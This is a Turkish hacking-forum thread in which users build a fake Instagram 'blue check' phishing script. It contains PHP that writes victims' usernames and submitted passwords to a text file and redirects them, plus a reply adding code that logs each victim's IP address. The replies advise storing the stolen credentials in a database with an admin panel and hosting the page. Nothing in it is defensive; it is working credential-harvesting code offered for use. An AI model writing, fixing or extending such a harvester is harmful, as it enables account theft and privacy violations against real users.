Mavi Tik Script - Sorun Yaşıyorum

Reis Bey

Yeni üye
14 Ocak 2019
9
0
Merhabalar yine bir Script yapıyorum bu php kodlarinda k adi ve nick şekiyor ama ip çekmiyor yazılımda yeni olduğum için çözemedim yardımcı olabilecek varmi eklenecek kodu kodların içine ekleyip verebilecek olan varmi şimdiden teşekkürler

<?php
error_reporting(0);

$nick=$_GET["nick"];
if($nick==="" || $nick===" "){$nick="instagram";}else if($nick==fale){$nick="instagram";}
if ($_POST) {
$password=$_POST["password"];
$ip=$_SERVER["REMOTE_ADDR"];
$nick=$_GET["nick"];
date_default_timezone_set('Europe/Istanbul');
$date=date("d-m-Y H:i:s");
$file = fopen('rip2.txt', 'a');
fwrite($file, " Kulaniciadi : ".$nick."\n\n" ." password: ".$password. "\n\n");

fclose($file);

header("********: error.php");
}

?>

Reis Bey

Yeni üye
14 Ocak 2019
9
0
<?php
$ipadres = $_SERVER["REMOTE_ADDR"];
$ipkayit = fopen("ipkayit.txt", "a");
fwrite($ipkayit,"$ipadres<br>");

servere ipkayit.txt ekle kurban ip adresi oraya kayıt olacaktır

iyi forumlar..

Çok sağolun hocam şimdi ise şoyle bir sorun yaşıyorum txt ye şifre giderken Türkçe karakter sorunu yaşıyorum html içine utf8 kodunu ekledim ama ne yazikki düzelmedi nasıl haedebilirim yani şöyle password: şif1

Reis Bey

Yeni üye
14 Ocak 2019
9
0
txt dosyası yerine data base kullanmayı deneyebilirsin data base ye kayıt olursa türkçe karakterleri ekleyebilirsin orada da sorun oluşursa aşağıda ki linke bakarak çözebilirsin diye düşünüyorum

https://www.google.com/search?q=php...gEHZ3dzLXdperABCsgBCLgBAsABAQ&sclient=gws-wiz

iyi forumlar..
hocam biraz fazla soru soruyorum kb aklımda vardı hatta sql e kayettirip ve admin panel entegre edip yapmak istiyorum ama nasıl yapacağıma dair bi kaynak veya yardımcı olacsk kimse yok elinizde kaynak varsa verebilirmisiniz veya müsait iseniz siz anlatirmisiniz

XKaraGERGEDANX

Uzman üye
19 Ocak 2021
1,372
1
113
3301/1.1.ano
hocam biraz fazla soru soruyorum kb aklımda vardı hatta sql e kayettirip ve admin panel entegre edip yapmak istiyorum ama nasıl yapacağıma dair bi kaynak veya yardımcı olacsk kimse yok elinizde kaynak varsa verebilirmisiniz veya müsait iseniz siz anlatirmisiniz

admin panel işi kolay da şimdi bizim site tam bir site olmayacak yani site kurmak için ayrı php çalışmak için ayrı oluyor bu işler de ama şimdi sen bu php kodlarını bir ortamda çalıştırıyor olman lazım yoksa php çalışmaz heralde senin php kodlarını çalıştırdığın ortama sql vs. falan eklenmiyor xampp kullanarak yaparsan sql ekleyebilirsin kendi pc ni hosta çevirirsin phpmyadmin ile yaparsın yada webhost0 gibi ücretsiz hosting veren yerlerden hosting alırsın sana local hostta yardımcı olacak bir iki video vereyim

[ame]https://www.youtube.com/watch?v=7C8Eb2VwTME[/ame]

[ame]https://www.youtube.com/watch?v=OHcMNNV5V6k[/ame]

şimdi bu videolar ile kendi pc ni local host yaparsın oradan php sql çalışabilirisin nasıl yapıldığına dair ders yok yani xamppa üzerinden anlatan işte sql nasıl kurulur gibi ders yok sql nasıl kurulur diye tek tek internetten aratacaksın sql dersini de internetten alırsın yukarda ki videolar da ki kurulumlar php sql çalışmak için sen web programlama da kendi ni geliştirdiğin de beni bul sana site kurma da da yardımcı olurum ceo hizmeti ds store domain arama motoru kayıdı vs. gibi

tekrar iyi forumlar..

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.